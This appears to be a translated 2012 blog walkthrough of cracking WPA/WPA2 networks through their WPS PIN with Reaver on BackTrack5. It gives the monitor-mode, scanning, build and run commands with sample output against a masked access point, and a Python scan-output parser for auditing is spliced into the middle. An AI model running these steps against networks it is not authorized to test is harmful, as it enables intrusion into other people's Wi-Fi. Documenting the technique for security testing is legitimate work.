[BackTrack5] WPS Crack (WPA/WPA2) - Reaver brute force attack tool v1.3

Posted by 파이s, 2012. 1. 5. 09:56
A tool that recovers the WPA/WPA2 PIN in plaintext has been released.

(article) http://threatpost.com/en_us/blogs/attack-tool-released-wps-pin-vulnerability-122911
(blog) http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html
(code) https://code.google.com/p/reaver-wps/downloads/list

Development seems to have already reached version 1.3. According to the documentation, a run takes between 4 and 10 hours and the reliability is about 95%. Curiosity got the better of me, so I tested it.

The test was set up in a BackTrack5 environment.

Step1) First, take a look at the wireless LAN driver environment..
root@bt:~# iwconfig
lo        no wireless extensions.

eth1      no wireless extensions.

wlan0  IEEE 802.11bgn  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm  
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

Step2) Put the interface into monitor mode...
root@bt:~# airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
1293    dhclient3
1754    dhclient3
Process with PID 1754 (dhclient3) is running on interface wlan0
Process with PID 3881 (reaver) is running on interface mon0

Interface    Chipset        Driver
wlan0        Ralink RT2870/3070    rt2800usb - [phy0]
                (monitor mode enabled on mon0)

Step3) Scan for nearby wireless APs...
root@bt:~# iwlist wlan0 scanning
...............
Cell 12 - Address: XX:XX:XX:XX:XX:XX  <- MAC
                    Channel:8
                    Frequency:2.447 GHz (Channel 8)
                    Quality=70/70  Signal level=26 dBm
                    Encryption key:on
                    ESSID:"XXXXXXXXXXXX"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
...............

(If that output is hard to read, airodump-ng works just as well)
root@bt:~# airodump-ng mon0

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

XX:XX:XX:XX:XX:XX  -82        1      0    0   1  54e  WPA2  CCMP    PSK   XXXXXXXXXXXX
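When auditing your own networks, the `iwlist` scan output above is easier to work with as structured records. The following parser is an added example (not code from the original post or from the Reaver project); it reads the `Cell NN - Address:` blocks shown in Step3 and flags APs that advertise no encryption. The sample scan text, the second cell, and the `guest-open` ESSID are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample in the format `iwlist <iface> scanning` prints. The first cell
# mirrors the one on the page (placeholder address/ESSID); the second is an added
# open AP so that the audit check has something to flag.
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 12 - Address: XX:XX:XX:XX:XX:XX
                    Channel:8
                    Frequency:2.447 GHz (Channel 8)
                    Quality=70/70  Signal level=26 dBm
                    Encryption key:on
                    ESSID:"XXXXXXXXXXXX"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Mode:Master
          Cell 13 - Address: 00:11:22:33:44:55
                    Channel:1
                    Quality=40/70  Signal level=-60 dBm
                    Encryption key:off
                    ESSID:"guest-open"
                    Mode:Master
"""

# A cell header: "Cell 12 - Address: XX:XX:XX:XX:XX:XX" (X placeholders allowed).
CELL_RE = re.compile(r"Cell\s+(\d+)\s+-\s+Address:\s*([0-9A-Fa-fXx:]{17})")


def parse_iwlist(text: str) -> List[Dict[str, object]]:
    """Parse iwlist scan output into one dict per cell (address, channel, encryption, essid)."""
    cells: List[Dict[str, object]] = []
    cur: Optional[Dict[str, object]] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = CELL_RE.match(line)
        if m:  # a new cell starts; later key lines belong to it
            cur = {"cell": int(m.group(1)), "address": m.group(2).upper(),
                   "channel": None, "encryption": None, "essid": None}
            cells.append(cur)
            continue
        if cur is None:
            continue  # header lines before the first cell
        if line.startswith("Channel:"):
            cur["channel"] = int(line.split(":", 1)[1])
        elif line.startswith("Encryption key:"):
            cur["encryption"] = line.split(":", 1)[1].strip() == "on"
        elif line.startswith("ESSID:"):
            cur["essid"] = line.split(":", 1)[1].strip().strip('"')
    return cells


def open_networks(cells: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the cells whose beacon advertises no encryption at all."""
    return [c for c in cells if c["encryption"] is False]
```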

Step4) Download and install the Reaver tool (it has to be compiled)
root@bt:~# wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz
root@bt:~# tar -zxvf reaver-1.3.tar.gz
root@bt:~# cd reaver-1.3/src     (move into the src directory of the extracted tarball)

root@bt:~/reaver-1.3/src# ./configure
root@bt:~/reaver-1.3/src# make
root@bt:~/reaver-1.3/src# make install

(Note: the libpcap-devel and sqlite-devel packages must be installed first; fortunately(?) BackTrack5 already has them all installed by default. Very convenient~)

Step5) Run Reaver!
root@bt:~# ./reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
                                                           (add the -L option if you want to ignore the timeout lock)

Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Restored previous session
[+] Waiting for beacon from 00:07:7D:14:63:1B
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXXXXXXXXXX)
[+] Trying pin 02042688
..........

That is what the output looks like.